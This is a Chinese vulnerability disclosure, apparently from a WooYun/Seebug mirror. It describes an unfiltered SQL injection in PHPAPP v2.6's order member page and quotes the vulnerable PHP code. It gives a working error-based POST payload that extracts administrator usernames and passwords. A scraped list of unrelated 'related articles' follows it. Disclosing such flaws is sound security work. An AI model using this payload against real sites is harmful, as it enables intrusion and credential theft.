### 简要描述:

PHPAPP注入第十枚(未过滤)

### 详细说明:

在wooyun上看到了有人提了PHPAPP的漏洞: http://wooyun.org/bugs/wooyun-2010-055604,然后去官网看了看,前几天刚有更新,就在官网下了PHPAPP最新的v2.6来看看(2014-12-11更新的)。

PSOT注入点:wwww.xxx.com/member.php?app=48&op=4&action=1, 存在漏洞的文件在/phpapp/apps/order/member_phpapp.php

随意注册个账号即可测试

来看看漏洞是如何产生的/phpapp/apps/order/member_phpapp.php

```

if($this->GET['op']==4){

if($this->POST['Submit']){

$content=$this->POST['content'];

$oid=intval($oderid);

$this->Update('task_order',array('content'=>$content),array()," WHERE oid='$oid'");

//文件

$files=$this->UploadFile();

if($files){

foreach($files as $fid){

$this->Insert('apps_file',array('appid'=>$this->app,'fid'=>$fid,'uid'=>$this->uid,'id'=>$oid,'type'=>3),array());

}

$this->ReplaceFileContent($files,'task_order',$content," WHERE oid='$oid' ");

}

echo '上传成功!';

echo $this->CloseNowWindows('#loading',1);

}

}

```

用户提交的content 没有经过过滤,拼接了sql语句,造成了注入。

Phpapp可以显错,那就用error-based blind进行注入。

Pyload:(POST提交)

```

Submit=1&content=1' or (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,username,0x23,password) from phpapp_member limit 0,1))a from phpapp_member group by a)b) or'

```

注入成功,管理员用户名及密码如下图中所示:

[](https://images.seebug.org/upload/201412/23235747caddfdfa3a066964a8ef3c61532fad5c.jpg)

### 漏洞证明:

见 详细说明

php member limit,PHPAPP注入第十枚(未过滤)相关推荐

  1. php充值注入,PHPAPP注入第二枚(漏洞打包)

    ### 简要描述: PHPAPP注入第二枚(漏洞打包) ### 详细说明: 在wooyun上看到了有人提了PHPAPP的漏洞: http://wooyun.org/bugs/wooyun-2010-0 ...

  2. Limit SQL注入

    Limit SQL注入 1. SQL注入介绍 2. Limit注入PHP代码 3. Limit注入测试 4. 代码漏洞修复 1. SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因: ...

  3. 山东科技大学c语言完全题库,“山东科技大学十大未解之谜”之完全解答

    "山东科技大学十大未解之谜"之完全解答 (2012-04-24 13:53:36) 标签: 娱乐 当我还是一枚小正太刚刚进入山科大的时候,我就看到过这些未解之谜,现在每每看到童鞋们 ...

  4. rust月球服务器名字_月亮的十大未解之谜

    关于月亮的十大未解之谜至今仍然无法解开,月亮未解之谜是人类科学的一大探索,古往今来,为了探索月亮的奥秘,人类付出了巨大的努力.月亮的十大未解之谜你都有了解过吗?今天小编给大家准备了月亮的十大未解之谜. ...

  5. 2017互联网十大未解之谜,你能回答几个?

    0关注「实验楼」,每天分享一个项目教程 互联网行业发生许多重大事件,比如微信小程序上线.顺丰菜鸟互撕.共享单车接连倒闭.乐视危机发酵.无人超市崛起.求职少年李文星之死.京东腾讯入股唯品会等.在互联网的 ...

  6. 文化中国 系列十:未归类系列

    系列十:未归类系列 21.[文化中国视频讲座][赵启光][文化中国]老子的智慧人生 完整性说明:10集完整. [视频点播及迅雷下载][赵启光][老子的智慧人生]1 神秘的老子 [视频点播及迅雷下载][ ...

  7. mysql limit sql注入_LIMIT子句中的盲 SQL注入漏洞利用

    原文:https://www.noob.ninja/2019/07/exploiting-tricky-blind-sql-injection.html 前言 嘿!有好长时间没有更新过博客了,不知道大 ...

  8. limit 后注入_聊一聊 SQLMAP 在进行 sql 注入时的整个流程

    本文作者:sher10ck(信安之路核心成员) 很多小伙伴在发现或者判断出注入的时候,大多数选择就是直接上 sqlmap,结果往往也不尽人意,于是就有想法来写写 sqlmap 从执行到判断注入,到底发 ...

  9. php member limit,php 安全有关问题

    php 安全问题 做web开发,相信搭建都知道一些安全基本知识,"千万不能相信客户端数据".而php又是一种弱类型语言.很多人在开发过程中忽略了类型转换,参数过滤直接量成不可估量的 ...

最新文章

  1. linux系统上tomcat启动正常,但浏览器无法访问
  2. 大理大学日常作业计算机基础知识,大理学院成人高等教育计算机应用基础课程作业题及答案...
  3. Samba服务器如何与Windows 95共享?
  4. 一个通用数据库操作组件DBUtil(c#)、支持SqlServer、Oracle、Mysql、postgres、SQLITE
  5. windows查询每个线程占用的内存_C#多线程
  6. 极简代码(七)—— SNR
  7. imu 里程计融合_多传感器融合 RLINS概述
  8. python+selenium自动化测试环境搭建步骤(selenium环境搭建)-绝不浪费您的时间
  9. (Python)计算器的设计与实现
  10. Java调用第三方http接口的常用方式
  11. vue axois 封装请求 | vue 解决跨域问题
  12. html语言什么时候加引号,什么时候冒号后面不用引号
  13. SwiftUI内功之如何设计Struct和Class不要和陌生人说话
  14. 11_传智播客iOS视频教程_NS前缀和@符号
  15. POI 写word,添加标题,表格,图片,自动生成目录,合并单元格
  16. 搭建本地 Protractor 运行环境
  17. QNX微内核RTOS
  18. 敏捷运维的实操 -- 迭代内工作量
  19. js把数据导出成excel的中文乱码问题解决
  20. c语言循环计算分式加减乘除混合运算,计算()_分式的加减乘除混合运算及分式的化简_中学题库-沪江中学学科网...

热门文章

  1. Leetcode 104.二叉树的最大深度 (每日一题 20210625)
  2. MATLAB问题解决方案- Matlab出现报错:​‘***‘不是内部或外部命令,也不是可运行的程序或批处理文件
  3. 贝叶斯学习--极大后验概率假设和极大似然假设
  4. Python开发工具PyCharm个性化设置备份
  5. 电压越低采集的ad值反而变大_80多条关于AD转换设计的经验总结
  6. python 统计list中各个元素出现的次数
  7. 为什么Servlet程序的init(ServletConfig config)中需要调用父类的init方法
  8. elasticSearch6源码分析(5)gateway模块
  9. EMR、EHR和PHR的定义与对比
  10. 在线支付之风控系统架构选型